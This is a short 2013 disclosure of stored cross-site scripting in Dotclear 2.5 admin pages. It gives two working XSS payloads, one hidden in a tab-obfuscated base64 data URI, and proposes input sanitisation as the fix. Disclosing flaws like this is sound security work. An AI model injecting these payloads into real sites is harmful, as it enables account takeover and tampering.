Exploit Title:  Dotclear 2.5 Cms Cross Site Scripting Vulnerabilities
# Date: 06/04/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link:http://dotclear.org/
# Versions Affected:  Dotclear 2.5.
# Category:Xss
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vulnerabilitie Description:

The Vulnerabilities in admin area users options and many other place input in is not sanitized. Therefore it results
in a stored cross-site scripting

Dotclear Description:
DotClear was design only for weblogs management, and do it well. It is completely free! DotClear is a free software distributed under the GNU General Public License..

POC:
http://www.youtube.com/watch?v=3eiEC8MtrpM&feature=youtu.be

Code :-
########################################################################################################
"><img src=x onerror=prompt(0);>

 <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

http://demo.xxx.com/admin/preferences.php
http://demo.xxx.com/dotclear/admin/users.php

##########################################################################################################
Fix:
Better sanitization by restricting special characters.

Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com